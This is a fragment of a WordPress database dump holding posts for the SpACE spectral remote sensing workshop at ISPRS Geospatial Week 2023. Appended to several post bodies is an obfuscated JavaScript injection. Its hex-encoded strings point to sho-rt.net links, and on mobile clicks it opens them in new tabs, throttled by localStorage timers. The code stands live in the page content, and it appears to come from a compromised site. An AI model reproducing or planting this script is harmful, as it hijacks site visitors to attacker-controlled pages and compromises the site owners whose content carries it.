_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2023-02-05 14:55:40','2023-02-05 14:55:40','',2586,'https://gsw2023.com/?p=3853',0,'revision','',0),
(3855,1,'2023-02-06 22:36:52','2023-02-06 22:36:52','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3859\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong></span></h5>\n<p>&nbsp;</p>\n<p><strong>Spectral remote sensing including hyperspectral, multispectral, thermal sensors onboard satellites, aerial, terrestrial and marine acquisition systems, as well as spectral data analytics is an active research topic in Remote Sensing and Computer Vision. This workshop will bring together experts working in cutting-edge spectral remote sensing systems to discuss recent developments in instrumentation, advanced analytics including artificial intelligence, cloud and edge computing methodologies, and future trends in automated information extraction from spectral data. Its fcus is on methodological research. SpACE will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></p>\n<p><u> </u>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>CHAIRS</strong></span></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"73\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Spaceborne, airborne, terrestrial, marine and mobile multispectral and hyperspectral sensors and data processing</li>\n<li>Thermal remote sensing</li>\n<li>Radiometric, atmospheric and geometric calibration/corrections of spectral and thermal data.</li>\n<li>Spectral unmixing, denoising, dimensionality reduction and compression of hyperspectral and multispectral data</li>\n<li>Processing and analysis of 1D signals, 2D images, 3D hyperspectral cubes and 4D spectral video datasets</li>\n<li>Fusion and harmonization of spectral/thermal data with other modalities (e.g., Lidar, SAR, Acoustic), a priori information, geospatial and multitemporal data</li>\n<li>AI methods for spectral data analysis and understanding</li>\n<li>Deep learning and explainability for spectral data analysis</li>\n<li>Cloud-based frameworks for spectral data analytics</li>\n<li>Edge-computing methods for efficient spectral data processing</li>\n<li>Analysis and applications based on multi-temporal and multi-sensor data</li>\n<li>Evaluation benchmarks for assessing method performance, robustness, explainability, scalability and generalization</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee </strong></h5>\n<ul>\n<li>Konstantinos Karantzalos , WG III/2 Chair</li>\n<li>Daniele Cerra , WG I/3 Chair</li>\n<li>Xinlian Liang, WG II/1 Chair</li>\n<li>Anna Brook (Israel) , WG III/2</li>\n<li>Jean-Louis Roujean , WG III/2</li>\n<li>Ilkka Pölönen , WG III/2</li>\n<li>Mi Wang, WG I/3</li>\n<li>Jose Marcato Junior , WG I/3</li>\n<li>Maria Teresa Melis , WG II/1</li>\n<li>Weishu Gong , WG II/1</li>\n<li>Martin Mokroš , WG II/1</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG III/2 Spectral and Thermal Data Processing and Analytics</li>\n<li>WG I/3 Multispectral, Hyperspectral and Thermal Sensors</li>\n<li>WG III/1 Remote Sensing Data Processing and Understanding</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Special Issue dedicated to the workshop:</strong></h5>\n<p>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to an International Journal (tba). The papers being accepted after the peer-review process of the journal will appear in a Special Issue of that journal dedicated to this workshop.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"3861\" img_size=\"1200x1000\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong>','','publish','closed','closed','','space-spectral-remote-sensing-in-the-era-of-ai-cloud-and-edge-computing','','','2023-02-07 02:08:46','2023-02-07 02:08:46','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3855',0,'dt_portfolio','',0),
(3856,1,'2023-02-06 22:36:41','2023-02-06 22:36:41','','ws28main','','inherit','open','closed','','ws28main','','','2023-02-06 22:36:41','2023-02-06 22:36:41','',3855,'https://gsw2023.com/wp-content/uploads/2023/02/ws28main.jpg',0,'attachment','image/jpeg',0),
(3857,1,'2023-02-06 22:36:52','2023-02-06 22:36:52','','<strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong>','','inherit','closed','closed','','3855-revision-v1','','','2023-02-06 22:36:52','2023-02-06 22:36:52','',3855,'https://gsw2023.com/?p=3857',0,'revision','',0),
(3858,1,'2023-02-06 22:48:51','2023-02-06 22:48:51','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong></span></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><strong>Spectral remote sensing including hyperspectral, multispectral, thermal sensors onboard satellites, aerial, terrestrial and marine acquisition systems, as well as spectral data analytics is an active research topic in Remote Sensing and Computer Vision. This workshop will bring together experts working in cutting-edge spectral remote sensing systems to discuss recent developments in instrumentation, advanced analytics including artificial intelligence, cloud and edge computing methodologies, and future trends in automated information extraction from spectral data. Its fcus is on methodological research. SpACE will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></p>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 